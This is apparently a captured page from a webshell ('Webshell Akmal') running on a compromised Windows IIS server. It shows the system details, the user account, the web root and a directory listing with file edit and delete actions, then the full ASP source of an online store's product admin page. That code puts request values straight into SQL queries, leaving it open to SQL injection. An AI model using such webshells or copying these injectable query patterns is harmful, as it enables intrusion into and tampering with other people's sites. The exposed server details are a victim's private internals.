Webshell Akmal archtte id

System: Microsoft Windows NT 10.0.20348.0

Server: Microsoft-IIS/10.0

User: buyyou

Directory: C:\MyData\WWW\asc365\

Name	Size	Type	Actions
ASC365_CANADA	-	Directory	Rename Delete
ASC365_Store01	-	Directory	Rename Delete
aspnet_client	-	Directory	Rename Delete
CompanyImage	-	Directory	Rename Delete
TJGS_USA	-	Directory	Rename Delete
zhijian	-	Directory	Rename Delete
Memo.inc	0 bytes	.inc	Edit Rename Delete
web.config	213 bytes	.config	Edit Rename Delete

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />


<%
	CheckAdmin1
'检测菜单是否存在，并查出所属语言，数据表，菜单名称
%>
<%
newproductid=request.QueryString("productid")
newtypeid=request.QueryString("typeid")
if Request("Action")="del" then
     newid=request.QueryString("id")
	 productid=request.QueryString("productid")
	sql="update newproductlist set usedstate=0 where id="&newid&""
	conn.Execute(sql)
	Response.Write("<script>location.href='Productused.asp ';</script>")
	Response.End
end if
%>
<%
if Request("Action")="RecomF" then
	conn.Execute("update "&Menu_MDB&" set Recommend='0',Time_Update='"& Now() &"' where id="&id&"")
	conn.close
	set conn=nothing
	Response.Write("<script>location.href='?menuid="&menuid&"&page="&CMSpage&"';</script>")
	Response.End
end if
%>
<%
if Request("Action")="RecomT" then
	conn.Execute("update "&Menu_MDB&" set Recommend='1',Time_Update='"& Now() &"' where id="&id&"")
	conn.close
	set conn=nothing
	Response.write("<script>location.href='?menuid="&menuid&"&page="&CMSpage&"';</script>")
	Response.End
end if
%>
<%
if Request("Action")="change" then
	if Request.Form("Hand_ID")="" then
		Response.Write("<script>alert('请填写手工序号');location.href='?menuid="&menuid&"&page="&CMSpage&"';</script>")
		Response.End
	elseif chk_num(Request.Form("Hand_ID"))=0 then 
		Response.Write("<script>alert('手工序号必须是大于0的整数');location.href='?menuid="&menuid&"&page="&CMSpage&"';</script>")
		Response.End
    end if
	Hand_ID=Request.Form("Hand_ID")
	id=request.QueryString("id")
	Time_Update=Now()
	conn.Execute("update productprice set sort="& Hand_ID &" where id="&id&"")
	conn.close
	set conn=nothing
	Response.Write("<script>alert('修改成功');location.href='?id="&id&"&page="&CMSpage&"';</script>")
	Response.End
end if

if request("Action")="Searchdata" then
    newproductid=session("newproductid")
end if

if request.Form("check")="Add used item" then
   newproductid=request.Form("productid")
   sql3="update newproductlist set usedstate=1,uptime='"&date&"' where productid='"&newproductid&"'"
   conn.execute sql3
end if

if request("action")="tuijian" then
id=request.QueryString("id")
set rs=server.createobject("adodb.recordset")
sql = "select * from newproductlist where id="&id&""
rs.open sql,conn,1,3
if not (rs.eof and rs.bof) then
if rs("tuijian")="1" then 
rs("tuijian")="0"
rs("update")=now()
tjian="所选商品已取消推荐，单击“确定”返回商品列表。"
else
rs("tuijian")="1"
rs("update")=now()
tjian="所选商品已列为推荐商品，单击“确定”返回商品列表。"
end if
rs.update
rs.close
end if
end if

if request("action")="tejia" then
id=request.QueryString("id")
set rs=server.createobject("adodb.recordset")
sql = "select * from newproductlist where id="&id&""
rs.open sql,conn,1,3
if not (rs.eof and rs.bof) then
if rs("tejia")="1" or rs("price2")<=0 then 
rs("tejia")="0"
tjia="所选商品已列为非特价商品，或者特价价格为0。"
else
rs("tejia")="1"
tjia="所选商品已列为特价商品，单击“确定”返回商品列表。"
end if
rs.update
rs.close
end if
end if

if request("action")="used" then
id=request.QueryString("id")
newproductid=request.QueryString("productid")
set rs=server.createobject("adodb.recordset")
sql = "select * from newproductlist where id="&id&""

rs.open sql,conn,1,3
if not (rs.eof and rs.bof) then
if rs("usedstate")="1" then 
   rs("usedstate")="0"
else
   if rs("usedprice1")>0 or rs("usedprice2")>0 then
     rs("usedstate")="1"
   end if
end if
rs.update
rs.close
end if
end if

if request("action")="keshou" then
id=request.QueryString("id")
set rs=server.createobject("adodb.recordset")
sql = "select * from newproductlist where id="&id&""
rs.open sql,conn,1,3
if not (rs.eof and rs.bof) then
if rs("useful")=1 then 
rs("useful")=0
else
rs("useful")=1
end if
rs("update")=now()
rs.update
rs.close
end if
end if
%>

<title></title>
<%call default_css_js()%>
<link href="css/thickbox.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="scripts/jquery-1.4.4.min.js"></script>
<script type="text/javascript" src="scripts/ThickBox/thickbox.js"></script>
</head>
<body>
<div id="cms_main">
  <div class="main_title"><span class="page_content">
<%
'检测菜单是属于哪个语言的，并把语言后台显示名显示出来
%></span></div>
  <div class="height5"></div>
<%
%>
  <table width="94%" id="main_content">
    <tr>
      <td colspan="12" class="content_list" align="left">
        <ul class="edit_menu">
		 <li></li>
		 
		  <li></li>
		  <li></li>
		
          <li></li>
		<form method="post" action="?Action=Searchdata">
        产品编码：
            <input type="text" name="productid" id="productid"  value="<%=newproductid%>"/>
            <input name="check" type="submit"  value="Add used item" />
		 </form>
      </ul></td>
    </tr>
    <tr class="content_title">
	 <td width="158">编码</td>
       <td width="600">产品名称</td>
       <td width="125">美元售价</td>
	   <td width="125">美元特价</td>
	   <td width="125">加元售价</td>
	   <td width="125">加元特价</td>
	   <td width="125">used美元</td>
	   <td width="125">used加元</td>
      <td width="200" style="background-image:none;">操作</td>
    </tr>
<%
Set Page = new Cls_Page				'创建对象
Set Page.Conn = conn				'得到数据库连接对象
With Page
	.PageSize = 20					'每页记录条数
	.PageParm = "page"					'页参数
	'.PageIndex = 10				'当前页，可选参数，一般是生成静态时需要
	.Database = "ac"				'数据库类型,AC为access,MSSQL为sqlserver2000存储过程版,MYSQL为mysql,PGSQL为PostGreSql
	.Pkey="id"						'主键
	.Field="id,typeid,productid,productname,productunit,price1,price2,jifen,ImgPrev,tuijian,tejia,uptime,useful,caprice1,caprice2,usedprice1,usedprice2,usedstate"	'字段
	.Table="newproductlist"			'表名
	.Condition=" usedstate=1 "
	.OrderBy="uptime desc"						'排序,不需要order by,需要asc或者desc
	.RecordCount = 0				'总记录数，可以外部赋值，0不保存（适合搜索），-1存为session，-2存为cookies，-3存为applacation
	.NumericJump = 5 '数字上下页个数，可选参数，默认为3，负数为跳转个数，0为显示所有
	.Template = "<div class=""page_list""><div class=""list_info"">每页{$PageSize}个&nbsp;|&nbsp;共({$RecordCount}个/{$PageCount}页)&nbsp;|&nbsp;当前第{$PageIndex}页 {$FirstPage}{$PreviousPage}{$NumericPage}{$NextPage}{$LastPage}</div></div>" '整体模板，可选参数，有默认值
	.FirstPage = "&nbsp;&lt;&lt;&nbsp;" '可选参数，有默认值
	'.FirstPage = "首页"
	.PreviousPage = "&nbsp;&lt;&nbsp;" '可选参数，有默认值
	'.PreviousPage = "上一页"
	.NextPage = "&nbsp;&gt;&nbsp;" '可选参数，有默认值
	'.NextPage = "下一页"
	.LastPage = "&nbsp;&gt;&gt;&nbsp;" '可选参数，有默认值
	'.LastPage = "尾页"
	.NumericPage = "{$PageNum}" '数字分页部分模板，可选参数，有默认值
End With

rs = Page.ResultSet() '记录集
'rc = Page.RowCount() '可选，输出总记录数
nav = Page.Nav() '分页样式

If IsNull(rs) Then
%>
    <tr>
      <td colspan="5" align="center" class="content_list">暂无信息</td>
    </tr>
<%
Else
	For i=0 To Ubound(rs,2)
%>
<script type="text/javascript">
function check<%=rs(0,i)%>()
{
	if(document.change<%=rs(0,i)%>.Hand_ID.value=="")
	{
		alert("请填写手工序号");
		document.change<%=rs(0,i)%>.Hand_ID.focus();
		return false
	}
//正则表达式判断
     //var re = /^[0-9]+.?[0-9]*$/;//判断字符串是否为数字
	 var re = /^[1-9]+[0-9]*]*$/;//判断字符串是否为正整数
	 if (!re.test(document.change<%=rs(0,i)%>.Hand_ID.value))
	 {
		 alert("手工序号必须是正整数");
		 document.change<%=rs(0,i)%>.Hand_ID.focus();
		 return false;
	 }
	 
	return true;
}
</script>
<form name="change<%=rs(0,i)%>" method="post" action="?Action=change&id=<%=rs(0,i)%>&productid=<%=rs(2,i)%>&page=<%=CMSpage%>" onSubmit="return check<%=rs(0,i)%>()">
    <tr class="content_list" onMouseOver="this.style.backgroundColor='#D3E1F6'" onMouseOut="this.style.backgroundColor=''">
	 <td style="padding-left:10px">
	 <%=rs(2,i)%>
        </td>
      <td align="left"><div align="left"><%=rs(3,i)%></div></td>
      <td><%=rs(5,i)%></td>
	   <td><%=rs(6,i)%></td>
	    <td><%=rs(13,i)%></td>
	   <td><%=rs(14,i)%></td>
	   <td><%=rs(15,i)%></td>
	   <td><%=rs(16,i)%></td>
	  <%
	  if rs(9,i)="0" then
tjian="../image/admin/prodgif1.gif"
else
tjian="../image/admin/prodgif3.gif"
end if
if rs(10,i)="0" then
tjia="../image/admin/prodgif2.gif"
else
tjia="../image/admin/prodgif4.gif"
end if

if rs(12,i)=0 then
xiaoshou="../image/admin/bukes.gif"
else
xiaoshou="../image/admin/keshou.gif"
end if

if rs(17,i)=0 then
used="../image/admin/used2.gif"
else
used="../image/admin/used1.gif"
end if
  
%>
      <td style="background-image:none;"><a href="Productused_edit.asp?id=<%=rs(0,i)%>&productid=<%=trim(rs(2,i))%>&page=<%=CMSpage%>&action=edit"><img src="images/info_edit.gif" alt="编辑<%=rs(2,i)%>" /></a>|<a title="确认删除" href="Products_del.asp?height=105&width=380&id=<%=rs(0,i)%>&productid=<%=trim(rs(2,i))%>&page=<%=CMSpage%>" class="thickbox"><img src="images/info_del.gif" alt="删除<%=rs(2,i)%>" /></a></td>
    </tr>
</form>
<%
	Next
End If
%>
</table>
<%Response.Write nav%>
<%
rs.close
set rs=nothing
%>
</div>
</body>
</html>